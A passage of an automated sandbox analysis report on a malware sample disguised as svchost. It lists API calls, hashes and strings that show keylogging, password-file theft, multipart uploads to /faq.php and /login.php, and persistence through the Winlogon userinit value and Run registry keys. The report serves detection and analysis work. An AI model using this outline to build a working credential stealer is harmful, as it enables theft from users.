                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,61FF864A), ref: 02A01451
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,0AFB4677), ref: 02A01515
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2654834253.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2a00000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocLibraryLoadVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3550616410-0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,75573490), ref: 02BB419D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB41A0
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB41B4
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB4224
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4232
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB4235
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4242
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB4245
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 02BB425D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB4260
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB4270
                                                                                                                                                                                                                • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BB428A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB4297
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB429A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB42AB
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB42AE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 02BB42DA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BB42DD
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB42F4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02BB4346
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB434D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB435E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB4365
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BB439D
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BB43B0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BB43C8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43DA
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB43DD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB43EA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB43ED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB43F9
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB43FC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BB4409
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB440C
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(02BB58F7,00000000,00000000,00000001), ref: 02BB446E
                                                                                                                                                                                                                • LockFile.KERNEL32(02BB58F7,00000000,00000000,00000001,00000000), ref: 02BB447E
                                                                                                                                                                                                                • WriteFile.KERNEL32(02BB58F7,00000000,00000001,00000000,00000000), ref: 02BB448D
                                                                                                                                                                                                                • UnlockFile.KERNEL32(02BB58F7,02BB58F7,00000000,00000001,00000000), ref: 02BB449D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44AC
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB44AF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB44BC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BB44BF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                                • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                                • API String ID: 2439004899-2402783461
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB68,75570F00,00000000,75572F00), ref: 02BC39E9
                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 02BC39FB
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3A1B
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BC3A2B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3B00
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02BC3B4C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3B59
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 02BC3B9A
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3BCA
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC3C72
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC3C7F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BC3C85
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3CA2
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BC3CB9
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BC4076
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 02BC4083
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC4096
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC40A3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40C7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC40CA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40D6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC40D9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40E7
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC40EA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC40F6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC40F9
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB68), ref: 02BC4100
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Path$Process$BackslashCurrentDirectory$AttributesCriticalDeleteFreeSectionValidate_snprintf$AllocCopyCountEnterExistsFolderLeaveTickVirtual
                                                                                                                                                                                                                • String ID: -----------------------------$%s%s$%s%u.zip$--$-----------------------------$3d11e105700a76c9$9E938D2Aa$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt
                                                                                                                                                                                                                • API String ID: 2790020909-272413446
                                                                                                                                                                                                                • Opcode ID: cf57ab37a81f65bc457ac3c38898bc7c665e905a33fd3951cc396ee38504c755
                                                                                                                                                                                                                • Instruction ID: 89e6c169b30d928480cb7e1482399d8f2654cbfa17d5aff28d21a1d2087a9f1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf57ab37a81f65bc457ac3c38898bc7c665e905a33fd3951cc396ee38504c755
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8226E319046465BCB218F3488A4BFB7BF6EF45344FA485C8ED969B281EB32D94DC790

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BC3BCA
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC3C72
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC3C7F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BC3C85
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC3CA2
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BC3CB9
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BC3CD6
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02BC3D05
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                                • String ID: -----------------------------$%s%u.zip$--$-----------------------------$3d11e105700a76c9$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                                • API String ID: 3203035732-2680028081
                                                                                                                                                                                                                • Opcode ID: 6e3c66a9694fcf209e64b310352c949bb1898671b41e3a03f8d8ae9a00109e81
                                                                                                                                                                                                                • Instruction ID: e2428dcd79b507c15aaee88293c68a2192306c01cfc645e497384e1dcd345c56
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e3c66a9694fcf209e64b310352c949bb1898671b41e3a03f8d8ae9a00109e81
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F15D319046465BCB258F3098A4BFB7BF6EF45344FA485C8ED869B241DB32DA49C7A0

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02BC7DFE
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02BC7E27
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E47
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02BC7E64
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC7E6B
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC7E7F
                                                                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BC7E99
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BC7EA1
                                                                                                                                                                                                                • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BC7F40
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F4F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC7F52
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7F5F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC7F62
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BC7F6C
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02BC7F8D
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02BC7FBD
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(?), ref: 02BC7FC7
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 02BC7FD1
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC7FD7
                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02BC800D
                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC801C
                                                                                                                                                                                                                • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02BC8039
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC8044
                                                                                                                                                                                                                • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02BC8067
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                                • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit

                                                                                                                                                                                                                Control-flow Graph

[Control-flow graph of the function starting at 02BC6970; legend: Executed / Not Executed]
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC6991
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02BC69C7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02BC69CE
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC69E3
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC69F2
                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 02BC6A06
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC6A2C
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 02BC6A6A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BC6AA6
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 02BC6ABB
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BC6AD3
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC6AE2
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC6AEF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B64
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC6B67
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B74
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC6B77
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02BC6BED
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC6BF0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6BFD
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC6C00
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02BC6C0F
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BC6C1C
                                                                                                                                                                                                                • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001,?,02BF96FC,00000001), ref: 02BC6C61
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                                • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d

                                                                                                                                                                                                                Control-flow Graph

[Control-flow graph of the function starting at 02BB6690; legend: Executed / Not Executed]
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB66B0
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02BC4B5D
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB670F
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB671F
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB6729
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB6734
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB674F
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB675C
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB6766
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB6771
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB6794
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67A1
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB67AB
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67B6
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB67D9
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67E6
                                                                                                                                                                                                                • calloc.MSVCRT ref: 02BB67F0
                                                                                                                                                                                                                • exit.MSVCRT ref: 02BB67FF
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                                  • Part of subcall function 02BC4AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                                • _strrev.MSVCRT ref: 02BB6869
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 02BB692C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BB692F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB693C
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 02BB693F
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02BB694A
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 02BB695B
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,?), ref: 02BB6962
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 10001, xrefs: 02BB682A
                                                                                                                                                                                                                • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02BB680D
                                                                                                                                                                                                                • /login.php, xrefs: 02BB66C1, 02BB66D8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                                • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                                • API String ID: 1958765476-2761129557
                                                                                                                                                                                                                • Opcode ID: e16c27784e8039d242a2f906dfd59a1f2e78f93c8de9f79ff1d6d7ce21671e71
                                                                                                                                                                                                                • Instruction ID: 4a33a5fe97b78c557e9bada39f6e69b6f5c3d1afbcbd5257d7ceb6dc13f95c6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e16c27784e8039d242a2f906dfd59a1f2e78f93c8de9f79ff1d6d7ce21671e71
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58811470E40315ABEB229F788C45BFA7FA8EF05745F044499FB45AB181D7F1A9448BE0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB3106
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5023
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5032
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD5039
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: memset.MSVCRT ref: 02BD5051
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD5068
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD506E
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD508F
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50B6
                                                                                                                                                                                                                  • Part of subcall function 02BD4FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50CA
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5124
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5133
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BD513A
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: memset.MSVCRT ref: 02BD5152
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5169
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD516F
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02BD5190
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51B7
                                                                                                                                                                                                                  • Part of subcall function 02BD50F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD51CB
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,75572F70,00000000), ref: 02BB3144
